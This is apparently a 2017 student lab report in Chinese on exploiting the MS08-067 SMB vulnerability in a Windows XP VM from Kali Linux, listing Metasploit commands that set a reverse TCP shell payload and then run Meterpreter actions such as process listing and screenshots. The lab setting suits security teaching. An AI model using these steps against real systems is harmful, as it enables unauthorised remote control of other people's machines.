20145329 《网络对抗技术》MS08_067远程漏洞攻击

MS08_067远程漏洞攻击:shell

实现攻击的前提是:攻击机和靶机在同一个网段下,首先将kali的ip改为与winxp的ip一样,二者能ping通

两台虚拟机:
kali ip:192.168.10.129
windows xp sp3:192.168.10.128

  • 1.kali打开msfconsole控制台

  • 2.在msf模式下查找ms08_067的漏洞攻击程序

  • 3."use exploit/windows/smb/ms08_067_netapi"进入该漏洞模块

  • 4."show payload"显示有效的攻击载荷,可以自选,以下使用generic/shell_reverse_tcp。

  • 5."show targets"查看可以被攻击的靶机的操作系统型号

  • 6.设置攻击有效载荷:set payload generic/shell_reverse_tcp

  • 7.“show options“查看需要需要设置的数据

  • 8.设置主机和靶机的ip和端口为下图所示

  • 9.exploit开始攻击

  • 10.获取靶机shell进行操作,与靶机本机操作结果一样

MS08_067远程漏洞攻击:meterpreter

  • 1.基础设置如以上步骤一样,设置攻击载荷时改为使用meterpreter


  • 2.运行exploit进行攻击

  • 3.”ifconfig“查看靶机地址

  • 4.“ps”查看进程

  • 5.对靶机进行截屏

  • 6.使用shell

posted @ 2017-04-16 20:11  20145329吉东云  阅读(195)  评论(0编辑  收藏  举报